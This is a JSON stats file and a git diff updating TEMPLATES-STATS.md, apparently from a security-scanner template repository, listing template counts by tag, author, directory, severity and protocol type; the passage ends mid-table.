default-login","count":1},{"name":"cocoon","count":1},{"name":"wmt","count":1},{"name":"gateone","count":1},{"name":"doh","count":1},{"name":"timeclock","count":1},{"name":"jeewms","count":1},{"name":"kyan","count":1},{"name":"pihole","count":1},{"name":"craftcms","count":1},{"name":"daybyday","count":1},{"name":"flexbe","count":1},{"name":"sureline","count":1},{"name":"netgenie","count":1},{"name":"smartblog","count":1},{"name":"travis","count":1},{"name":"imap","count":1},{"name":"matrix","count":1},{"name":"ueditor","count":1},{"name":"openrestry","count":1},{"name":"lanproxy","count":1},{"name":"rabbitmq","count":1},{"name":"nuxeo","count":1},{"name":"webui","count":1},{"name":"sonarcloud","count":1},{"name":"rhymix","count":1},{"name":"wondercms","count":1},{"name":"default","count":1},{"name":"jnoj","count":1},{"name":"shoppable","count":1},{"name":"weglot","count":1},{"name":"pagerduty","count":1},{"name":"loganalyzer","count":1},{"name":"playable","count":1},{"name":"phpinfo","count":1},{"name":"geolocation","count":1},{"name":"influxdb","count":1},{"name":"instagram","count":1},{"name":"plugin","count":1},{"name":"javamelody","count":1},{"name":"resourcespace","count":1},{"name":"streetview","count":1},{"name":"rockethchat","count":1},{"name":"domxss","count":1},{"name":"wavemaker","count":1},{"name":"alertmanager","count":1},{"name":"apos","count":1},{"name":"xdcms","count":1},{"name":"ruby","count":1},{"name":"sourcebans","count":1},{"name":"zeroshell","count":1},{"name":"motorola","count":1},{"name":"openweather","count":1},{"name":"exacqvision","count":1},{"name":"luftguitar","count":1},{"name":"rubedo","count":1},{"name":"robomongo","count":1},{"name":"nsasg","count":1},{"name":"scs","count":1},{"name":"nweb2fax","count":1},{"name":"okiko","count":1},{"name":"concrete","count":1},{"name":"nuuo","count":1},{"name":"dotclear","count":1},{"name":"flink","count":1},{"name":"livezilla","count":1},{"name":"fcm","count":1},{"name":"cve2006","count":1},{"name":"whm","count":1},{"name":"aura","count":1},{"name":"nordex","count":1},{"name":"ilo4","count":1},{"name":"scimono","count":1},{"name":"tectuus","count":1},{"name":"graph","count":1},{"name":"csod","count":1},{"name":"webmodule-ee","count":1},{"name":"kafdrop","count":1},{"name":"opensns","count":1},{"name":"discourse","count":1},{"name":"stripe","count":1},{"name":"salesforce","count":1},{"name":"tapestry","count":1},{"name":"darkstat","count":1},{"name":"setup","count":1},{"name":"gstorage","count":1},{"name":"krweb","count":1},{"name":"yachtcontrol","count":1},{"name":"eyelock","count":1},{"name":"directions","count":1},{"name":"elevation","count":1},{"name":"fortigates","count":1},{"name":"fiori","count":1},{"name":"square","count":1},{"name":"openstack","count":1},{"name":"szhe","count":1},{"name":"springframework","count":1},{"name":"jfrog","count":1},{"name":"spf","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":281},{"name":"dhiyaneshdk","count":278},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":67},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":53},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"melbadry9","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"kophjager007","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"randomstr1ng","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"divya_mudgal","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":6},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"xelkomy","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":5},{"name":"johnk3r","count":5},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"wisnupramoedya","count":4},{"name":"incogbyte","count":4},{"name":"tess","count":4},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"idealphase","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"me9187","count":3},{"name":"fyoorer","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"sullo","count":3},{"name":"sushantkamble","count":3},{"name":"shine","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"vsh00t","count":3},{"name":"johnjhacking","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"f1tz","count":3},{"name":"pxmme1337","count":2},{"name":"0xrudra","count":2},{"name":"gal nagli","count":2},{"name":"0xsmiley","count":2},{"name":"fabaff","count":2},{"name":"0xsapra","count":2},{"name":"0xcrypto","count":2},{"name":"g4l1t0","count":2},{"name":"foulenzer","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"whoever","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"parth","count":2},{"name":"w4cky_","count":2},{"name":"manas_harsh","count":2},{"name":"ehsahil","count":2},{"name":"sy3omda","count":2},{"name":"convisoappsec","count":2},{"name":"r3naissance","count":2},{"name":"r12w4n","count":2},{"name":"bernardofsr","count":2},{"name":"cocxanh","count":2},{"name":"swissky","count":2},{"name":"huowuzhao","count":2},{"name":"hahwul","count":2},{"name":"kiblyn11","count":2},{"name":"koti2","count":2},{"name":"ree4pwn","count":2},{"name":"gevakun","count":2},{"name":"lotusdll","count":2},{"name":"moritz nentwig","count":2},{"name":"joeldeleep","count":2},{"name":"hetroublemakr","count":2},{"name":"randomrobbie","count":2},{"name":"bp0lr","count":2},{"name":"bsysop","count":2},{"name":"afaq","count":2},{"name":"arcc","count":2},{"name":"x1m_martijn","count":2},{"name":"mohammedsaneem","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xelkomy","count":2},{"name":"0xprial","count":2},{"name":"udit_thakkur","count":2},{"name":"alifathi-h1","count":2},{"name":"vavkamil","count":2},{"name":"random-robbie","count":2},{"name":"nkxxkn","count":2},{"name":"socketz","count":2},{"name":"davidmckennirey","count":2},{"name":"d0rkerdevil","count":1},{"name":"thebinitghimire","count":1},{"name":"toufik airane","count":1},{"name":"alex","count":1},{"name":"thevillagehacker","count":1},{"name":"mah3sec_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"iampritam","count":1},{"name":"apt-mirror","count":1},{"name":"tim_koopmans","count":1},{"name":"petruknisme","count":1},{"name":"smaranchand","count":1},{"name":"@dwisiswant0","count":1},{"name":"rodnt","count":1},{"name":"cookiehanhoan","count":1},{"name":"shifacyclewla","count":1},{"name":"pratik khalane","count":1},{"name":"bjhulst","count":1},{"name":"droberson","count":1},{"name":"andysvints","count":1},{"name":"akshansh","count":1},{"name":"mesaglio","count":1},{"name":"52971","count":1},{"name":"push4d","count":1},{"name":"brabbit10","count":1},{"name":"manuelbua","count":1},{"name":"_harleo","count":1},{"name":"yashgoti","count":1},{"name":"hakluke","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ahmed sherif","count":1},{"name":"geraldino2","count":1},{"name":"0xteles","count":1},{"name":"rojanrijal","count":1},{"name":"patralos","count":1},{"name":"izn0u","count":1},{"name":"_c0wb0y_","count":1},{"name":"luci","count":1},{"name":"alph4byt3","count":1},{"name":"th3.d1p4k","count":1},{"name":"blckraven","count":1},{"name":"sickwell","count":1},{"name":"taielab","count":1},{"name":"0xd0ff9","count":1},{"name":"shreyapohekar","count":1},{"name":"wabafet","count":1},{"name":"0xtavian","count":1},{"name":"thezakman","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"mubassirpatel","count":1},{"name":"akash.c","count":1},{"name":"zandros0","count":1},{"name":"noamrathaus","count":1},{"name":"mass0ma","count":1},{"name":"udyz","count":1},{"name":"andirrahmani1","count":1},{"name":"ooooooo_q","count":1},{"name":"micha3lb3n","count":1},{"name":"evolutionsec","count":1},{"name":"ahmetpergamum","count":1},{"name":"elder tao","count":1},{"name":"infosecsanyam","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"adrianmf","count":1},{"name":"mhdsamx","count":1},{"name":"bad5ect0r","count":1},{"name":"jrolf","count":1},{"name":"soyelmago","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"jteles","count":1},{"name":"tirtha_mandal","count":1},{"name":"sec_hawk","count":1},{"name":"undefl0w","count":1},{"name":"yavolo","count":1},{"name":"vzamanillo","count":1},{"name":"ilovebinbash","count":1},{"name":"berkdusunur","count":1},{"name":"exploitation","count":1},{"name":"xstp","count":1},{"name":"juicypotato1","count":1},{"name":"yashanand155","count":1},{"name":"retr0","count":1},{"name":"clarkvoss","count":1},{"name":"cristi vlad (@cristivlad25)","count":1},{"name":"jeya seelan","count":1},{"name":"aresx","count":1},{"name":"raesene","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"becivells","count":1},{"name":"kurohost","count":1},{"name":"chron0x","count":1},{"name":"defr0ggy","count":1},{"name":"x6263","count":1},{"name":"kre80r","count":1},{"name":"ajaysenr","count":1},{"name":"@ofjaaah","count":1},{"name":"lark lab","count":1},{"name":"kabirsuda","count":1},{"name":"whynotke","count":1},{"name":"fmunozs","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"0xrod","count":1},{"name":"oscarintherocks","count":1},{"name":"c3l3si4n","count":1},{"name":"b0yd","count":1},{"name":"borna nematzadeh","count":1},{"name":"pdp","count":1},{"name":"naglinagli","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"furkansenan","count":1},{"name":"luskabol","count":1},{"name":"nerrorsec","count":1},{"name":"intx0x80","count":1},{"name":"flag007","count":1},{"name":"kareemse1im","count":1},{"name":"daviey","count":1},{"name":"s1r1u5_","count":1},{"name":"philippdelteil","count":1},{"name":"b4uh0lz","count":1},{"name":"co0nan","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"elmahdi","count":1},{"name":"remonsec","count":1},{"name":"pudsec","count":1},{"name":"notsoevilweasel","count":1},{"name":"omarkurt","count":1},{"name":"absshax","count":1},{"name":"nvn1729","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"un-fmunozs","count":1},{"name":"ohlinge","count":1},{"name":"fopina","count":1},{"name":"streetofhackerr007","count":1},{"name":"forgedhallpass","count":1},{"name":"zhenwarx","count":1},{"name":"ldionmarcil","count":1},{"name":"nytr0gen","count":1},{"name":"makyotox","count":1},{"name":"its0x08","count":1},{"name":"gboddin","count":1},{"name":"dawid-czarnecki","count":1},{"name":"ringo","count":1},{"name":"ipanda","count":1},{"name":"0ut0fb4nd","count":1},{"name":"orpheus","count":1},{"name":"j33n1k4","count":1},{"name":"deena","count":1},{"name":"elouhi","count":1},{"name":"sshell","count":1},{"name":"0h1in9e","count":1},{"name":"qlkwej","count":1},{"name":"willd96","count":1},{"name":"alperenkesk","count":1},{"name":"rotemreiss","count":1},{"name":"b0rn2r00t","count":1},{"name":"knassar702","count":1},{"name":"revblock","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"sicksec","count":1},{"name":"bolli95","count":1}],"directory":[{"name":"cves","count":836},{"name":"vulnerabilities","count":327},{"name":"exposed-panels","count":270},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":141},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":750},{"name":"high","count":649},{"name":"medium","count":475},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2211},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 7e62861261..32a1631abc 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,925 +1,926 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | -| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | -| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | +| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | -| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | -| cve2021 | 155 | zzeitlin | 63 | workflows | 38 | | | | | -| joomla | 128 | 0x_akoko | 50 | network | 32 | | | | | +| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | +| rce | 214 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | +| cve2021 | 155 | madrobot | 63 | workflows | 38 | | | | | +| joomla | 128 | 0x_akoko | 53 | network | 32 | | | | | | cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | | cve2019 | 97 | philippedelteil | 29 | miscellaneous | 24 | | | | | | config | 95 | ice3man | 26 | dns | 12 | | | | | -| cve2018 | 88 | organiccrap | 24 | fuzzing | 10 | | | | | -| apache | 73 | sheikhrishad | 15 | cnvd | 9 | | | | | -| takeover | 69 | pr3r00t | 15 | headless | 5 | | | | | -| default-login | 68 | milo2012 | 14 | | | | | | | +| cve2018 | 92 | organiccrap | 24 | fuzzing | 10 | | | | | +| apache | 73 | pr3r00t | 15 | cnvd | 9 | | | | | +| iot | 70 | sheikhrishad | 15 | headless | 5 | | | | | +| takeover | 69 | milo2012 | 14 | | | | | | | | oob | 68 | techbrunchfr | 13 | | | | | | | -| iot | 68 | suman_kar | 12 | | | | | | | +| default-login | 68 | suman_kar | 12 | | | | | | | | token | 67 | cyllective | 11 | | | | | | | | token-spray | 63 | r3dg33k | 11 | | | | | | | -| cve2017 | 51 | wdahlenb | 10 | | | | | | | -| file | 50 | nadino | 10 | | | | | | | +| cve2017 | 51 | random_robbie | 10 | | | | | | | +| file | 50 | righettod | 10 | | | | | | | | unauth | 49 | melbadry9 | 10 | | | | | | | -| network | 43 | random_robbie | 10 | | | | | | | -| ssrf | 41 | righettod | 10 | | | | | | | +| network | 43 | nadino | 10 | | | | | | | +| ssrf | 41 | wdahlenb | 10 | | | | | | | | sqli | 40 | hackergautam | 9 | | | | | | | -| | 38 | aashiq | 8 | | | | | | | -| cve2016 | 37 | that_juan_ | 8 | | | | | | | -| redirect | 37 | zh | 8 | | | | | | | -| oracle | 36 | iamthefrogy | 8 | | | | | | | -| logs | 30 | dr_set | 7 | | | | | | | -| google | 30 | emadshanab | 7 | | | | | | | -| jira | 28 | 0x240x23elu | 7 | | | | | | | -| atlassian | 28 | dogasantos | 7 | | | | | | | -| cve2015 | 28 | techryptic (@tech) | 7 | | | | | | | -| cisco | 27 | randomstr1ng | 7 | | | | | | | +| | 38 | zh | 8 | | | | | | | +| redirect | 37 | aashiq | 8 | | | | | | | +| cve2016 | 37 | iamthefrogy | 8 | | | | | | | +| oracle | 36 | that_juan_ | 8 | | | | | | | +| logs | 30 | techryptic (@tech) | 7 | | | | | | | +| google | 30 | randomstr1ng | 7 | | | | | | | +| cve2015 | 29 | oppsec | 7 | | | | | | | +| atlassian | 29 | harshbothra_ | 7 | | | | | | | +| jira | 29 | meme-lord | 7 | | | | | | | +| cve2014 | 27 | 0x240x23elu | 7 | | | | | | | +| cisco | 27 | dogasantos | 7 | | | | | | | | listing | 27 | kophjager007 | 7 | | | | | | | -| cve2014 | 27 | harshbothra_ | 7 | | | | | | | -| generic | 24 | oppsec | 7 | | | | | | | -| misc | 23 | meme-lord | 7 | | | | | | | -| disclosure | 23 | puzzlepeaches | 6 | | | | | | | -| auth-bypass | 23 | logicalhunter | 6 | | | | | | | -| router | 21 | divya_mudgal | 6 | | | | | | | -| misconfig | 20 | pentest_swissky | 6 | | | | | | | -| aem | 19 | caspergn | 6 | | | | | | | -| sap | 18 | __fazal | 6 | | | | | | | -| cve2012 | 18 | ganofins | 5 | | | | | | | -| debug | 18 | rootxharsh | 5 | | | | | | | -| springboot | 18 | lu4nx | 5 | | | | | | | -| php | 16 | xelkomy | 5 | | | | | | | -| cve2011 | 15 | yanyun | 5 | | | | | | | -| devops | 15 | johnk3r | 5 | | | | | | | -| weblogic | 14 | iamnoooob | 5 | | | | | | | +| generic | 24 | dr_set | 7 | | | | | | | +| misc | 23 | emadshanab | 7 | | | | | | | +| disclosure | 23 | divya_mudgal | 6 | | | | | | | +| auth-bypass | 23 | caspergn | 6 | | | | | | | +| misconfig | 22 | logicalhunter | 6 | | | | | | | +| router | 22 | puzzlepeaches | 6 | | | | | | | +| aem | 19 | __fazal | 6 | | | | | | | +| cve2012 | 18 | pentest_swissky | 6 | | | | | | | +| springboot | 18 | panch0r3d | 5 | | | | | | | +| sap | 18 | lu4nx | 5 | | | | | | | +| debug | 18 | ganofins | 5 | | | | | | | +| php | 16 | yanyun | 5 | | | | | | | +| devops | 15 | rootxharsh | 5 | | | | | | | +| cve2011 | 15 | iamnoooob | 5 | | | | | | | | login | 14 | elsfa7110 | 5 | | | | | | | -| struts | 14 | joanbono | 5 | | | | | | | -| cve2009 | 14 | panch0r3d | 5 | | | | | | | -| fuzz | 14 | e_schultze_ | 4 | | | | | | | -| aws | 14 | github.com/its0x08 | 4 | | | | | | | -| deserialization | 13 | incogbyte | 4 | | | | | | | -| zoho | 13 | nodauf | 4 | | | | | | | -| dns | 13 | johnjhacking | 3 | | | | | | | -| android | 13 | fyoorer | 3 | | | | | | | -| adobe | 13 | emenalf | 3 | | | | | | | -| manageengine | 12 | thomas_from_offensity | 3 | | | | | | | -| dlink | 12 | f1tz | 3 | | | | | | | -| wp-theme | 12 | jarijaas | 3 | | | | | | | -| jenkins | 12 | impramodsargar | 3 | | | | | | | -| magento | 11 | yash anand @yashanand155 | 3 | | | | | | | -| cve2013 | 11 | _generic_human_ | 3 | | | | | | | -| intrusive | 10 | binaryfigments | 3 | | | | | | | -| xxe | 10 | tess | 3 | | | | | | | -| dell | 10 | 0w4ys | 3 | | | | | | | -| hp | 10 | unstabl3 | 3 | | | | | | | -| vmware | 9 | dudez | 3 | | | | | | | -| kubernetes | 9 | shine | 3 | | | | | | | -| ftp | 9 | vsh00t | 3 | | | | | | | -| gitlab | 8 | mavericknerd | 3 | | | | | | | -| cve2008 | 8 | sushantkamble | 3 | | | | | | | -| backup | 8 | me9187 | 3 | | | | | | | -| scada | 8 | sullo | 3 | | | | | | | -| rails | 8 | z3bd | 3 | | | | | | | -| ibm | 8 | shifacyclewala | 3 | | | | | | | -| ruijie | 8 | skeltavik | 3 | | | | | | | -| cnvd | 8 | idealphase | 3 | | | | | | | -| nginx | 8 | bp0lr | 2 | | | | | | | -| airflow | 8 | 0xrudra | 2 | | | | | | | -| microsoft | 8 | socketz | 2 | | | | | | | -| fastjson | 8 | g4l1t0 | 2 | | | | | | | -| netgear | 7 | 0xsapra | 2 | | | | | | | -| cms | 7 | w4cky_ | 2 | | | | | | | -| confluence | 7 | udit_thakkur | 2 | | | | | | | -| coldfusion | 7 | bernardofsr | 2 | | | | | | | -| files | 7 | arcc | 2 | | | | | | | -| drupal | 6 | r3naissance | 2 | | | | | | | -| jetty | 6 | 0xelkomy | 2 | | | | | | | -| laravel | 6 | parth | 2 | | | | | | | -| docker | 6 | 0xsmiley | 2 | | | | | | | -| nodejs | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| solr | 6 | pxmme1337 | 2 | | | | | | | -| lucee | 6 | dheerajmadhukar | 2 | | | | | | | -| rconfig | 6 | koti2 | 2 | | | | | | | -| django | 6 | hetroublemakr | 2 | | | | | | | -| fileupload | 6 | davidmckennirey | 2 | | | | | | | -| api | 6 | huowuzhao | 2 | | | | | | | -| camera | 6 | vavkamil | 2 | | | | | | | -| citrix | 6 | amsda | 2 | | | | | | | -| windows | 5 | mohammedsaneem | 2 | | | | | | | -| jolokia | 5 | fabaff | 2 | | | | | | | -| ssti | 5 | sy3omda | 2 | | | | | | | -| iis | 5 | cocxanh | 2 | | | | | | | -| tomcat | 5 | foulenzer | 2 | | | | | | | -| java | 5 | r12w4n | 2 | | | | | | | -| phpmyadmin | 5 | hahwul | 2 | | | | | | | -| printer | 5 | whoever | 2 | | | | | | | -| dedecms | 5 | x1m_martijn | 2 | | | | | | | -| crlf | 5 | gevakun | 2 | | | | | | | -| headless | 5 | kiblyn11 | 2 | | | | | | | -| circarlife | 5 | joeldeleep | 2 | | | | | | | -| solarwinds | 4 | 0xprial | 2 | | | | | | | -| thinkphp | 4 | afaq | 2 | | | | | | | -| npm | 4 | ree4pwn | 2 | | | | | | | -| strapi | 4 | gal nagli | 2 | | | | | | | -| resin | 4 | randomrobbie | 2 | | | | | | | -| thinkcmf | 4 | manas_harsh | 2 | | | | | | | -| grafana | 4 | nkxxkn | 2 | | | | | | | -| webserver | 4 | zomsop82 | 2 | | | | | | | -| hongdian | 4 | 0xcrypto | 2 | | | | | | | -| fatpipe | 4 | random-robbie | 2 | | | | | | | -| elastic | 4 | bsysop | 2 | | | | | | | -| maps | 4 | moritz nentwig | 2 | | | | | | | -| exchange | 4 | alifathi-h1 | 2 | | | | | | | -| traversal | 4 | swissky | 2 | | | | | | | -| firmware | 4 | bing0o | 2 | | | | | | | -| rfi | 4 | convisoappsec | 2 | | | | | | | -| samsung | 4 | lotusdll | 2 | | | | | | | -| symantec | 4 | ehsahil | 2 | | | | | | | -| amazon | 4 | mubassirpatel | 1 | | | | | | | -| symfony | 4 | smaranchand | 1 | | | | | | | -| zabbix | 4 | omarkurt | 1 | | | | | | | -| wso2 | 4 | thevillagehacker | 1 | | | | | | | -| asp | 4 | mhdsamx | 1 | | | | | | | -| glpi | 4 | micha3lb3n | 1 | | | | | | | -| firebase | 4 | taielab | 1 | | | | | | | -| zimbra | 4 | luskabol | 1 | | | | | | | -| vpn | 4 | iampritam | 1 | | | | | | | -| git | 4 | hanlaomo | 1 | | | | | | | -| artifactory | 4 | ohlinge | 1 | | | | | | | -| slack | 4 | regala_ | 1 | | | | | | | -| buffalo | 4 | petruknisme | 1 | | | | | | | -| magmi | 4 | j33n1k4 | 1 | | | | | | | -| proxy | 4 | tirtha_mandal | 1 | | | | | | | -| moodle | 4 | 0ut0fb4nd | 1 | | | | | | | -| fpd | 3 | aceseven (digisec360) | 1 | | | | | | | -| nosqli | 3 | soyelmago | 1 | | | | | | | -| jeesns | 3 | 0xteles | 1 | | | | | | | -| caucho | 3 | wabafet | 1 | | | | | | | -| openam | 3 | evolutionsec | 1 | | | | | | | -| tikiwiki | 3 | udyz | 1 | | | | | | | -| terramaster | 3 | yashgoti | 1 | | | | | | | -| springcloud | 3 | akash.c | 1 | | | | | | | -| ebs | 3 | alperenkesk | 1 | | | | | | | -| lansweeper | 3 | dawid-czarnecki | 1 | | | | | | | -| cacti | 3 | kba@sogeti_esec | 1 | | | | | | | -| telerik | 3 | fmunozs | 1 | | | | | | | -| exposures | 3 | naglinagli | 1 | | | | | | | -| lfr | 3 | elder tao | 1 | | | | | | | -| prometheus | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| vbulletin | 3 | sec_hawk | 1 | | | | | | | -| httpd | 3 | elouhi | 1 | | | | | | | -| smtp | 3 | alex | 1 | | | | | | | -| fanruan | 3 | pudsec | 1 | | | | | | | -| itop | 3 | jrolf | 1 | | | | | | | -| cve2007 | 3 | qlkwej | 1 | | | | | | | -| kevinlab | 3 | co0nan | 1 | | | | | | | -| mail | 3 | oscarintherocks | 1 | | | | | | | -| backdoor | 3 | manuelbua | 1 | | | | | | | -| ofbiz | 3 | affix | 1 | | | | | | | -| r-seenet | 3 | vzamanillo | 1 | | | | | | | -| opensis | 3 | noamrathaus | 1 | | | | | | | -| kafka | 3 | @dwisiswant0 | 1 | | | | | | | -| openssh | 3 | un-fmunozs | 1 | | | | | | | -| cloud | 3 | notsoevilweasel | 1 | | | | | | | -| github | 3 | andirrahmani1 | 1 | | | | | | | -| jellyfin | 3 | shelld3v | 1 | | | | | | | -| search | 3 | bad5ect0r | 1 | | | | | | | -| hoteldruid | 3 | nytr0gen | 1 | | | | | | | -| log | 3 | its0x08 | 1 | | | | | | | -| druid | 3 | mesaglio | 1 | | | | | | | -| linkerd | 3 | 52971 | 1 | | | | | | | -| targa | 3 | ratnadip gajbhiye | 1 | | | | | | | -| nacos | 3 | flag007 | 1 | | | | | | | -| microstrategy | 3 | mass0ma | 1 | | | | | | | -| node | 3 | deena | 1 | | | | | | | -| injection | 3 | 0xtavian | 1 | | | | | | | -| cves | 3 | @ofjaaah | 1 | | | | | | | -| bitrix | 3 | b4uh0lz | 1 | | | | | | | -| nexus | 3 | apt-mirror | 1 | | | | | | | -| bigip | 3 | whynotke | 1 | | | | | | | -| oa | 3 | _darrenmartyn | 1 | | | | | | | -| ssh | 3 | knassar702 | 1 | | | | | | | -| azure | 3 | gboddin | 1 | | | | | | | -| zhiyuan | 3 | c3l3si4n | 1 | | | | | | | -| mongodb | 3 | rojanrijal | 1 | | | | | | | -| kibana | 3 | jeya seelan | 1 | | | | | | | -| mcafee | 2 | luci | 1 | | | | | | | -| nextcloud | 2 | sicksec | 1 | | | | | | | -| xxljob | 2 | bolli95 | 1 | | | | | | | -| bruteforce | 2 | push4d | 1 | | | | | | | -| hashicorp | 2 | defr0ggy | 1 | | | | | | | -| ec2 | 2 | ahmed sherif | 1 | | | | | | | -| wuzhicms | 2 | 0xd0ff9 | 1 | | | | | | | -| axis | 2 | shreyapohekar | 1 | | | | | | | -| netis | 2 | infosecsanyam | 1 | | | | | | | -| splunk | 2 | forgedhallpass | 1 | | | | | | | -| chiyu | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| rstudio | 2 | yavolo | 1 | | | | | | | -| yii | 2 | toufik airane | 1 | | | | | | | -| ucmdb | 2 | ooooooo_q | 1 | | | | | | | -| frp | 2 | mah3sec_ | 1 | | | | | | | -| smb | 2 | akshansh | 1 | | | | | | | -| guacamole | 2 | remonsec | 1 | | | | | | | -| ecology | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| rancher | 2 | kre80r | 1 | | | | | | | -| jeedom | 2 | thebinitghimire | 1 | | | | | | | -| s3 | 2 | th3.d1p4k | 1 | | | | | | | -| icewarp | 2 | 0h1in9e | 1 | | | | | | | -| bucket | 2 | alph4byt3 | 1 | | | | | | | -| places | 2 | rotemreiss | 1 | | | | | | | -| tidb | 2 | clarkvoss | 1 | | | | | | | -| hostheader-injection | 2 | cookiehanhoan | 1 | | | | | | | -| getsimple | 2 | ldionmarcil | 1 | | | | | | | -| hasura | 2 | nerrorsec | 1 | | | | | | | -| maian | 2 | @github.com/defr0ggy | 1 | | | | | | | -| heroku | 2 | brabbit10 | 1 | | | | | | | -| voipmonitor | 2 | fopina | 1 | | | | | | | -| text | 2 | d0rkerdevil | 1 | | | | | | | -| cve2005 | 2 | s1r1u5_ | 1 | | | | | | | -| trixbox | 2 | pratik khalane | 1 | | | | | | | -| hjtcloud | 2 | yashanand155 | 1 | | | | | | | -| sitecore | 2 | tim_koopmans | 1 | | | | | | | -| totemomail | 2 | zhenwarx | 1 | | | | | | | -| cache | 2 | hakluke | 1 | | | | | | | -| saltstack | 2 | raesene | 1 | | | | | | | -| showdoc | 2 | chron0x | 1 | | | | | | | -| axis2 | 2 | _c0wb0y_ | 1 | | | | | | | -| wordfence | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| yapi | 2 | b0yd | 1 | | | | | | | -| db | 2 | blckraven | 1 | | | | | | | -| prestashop | 2 | 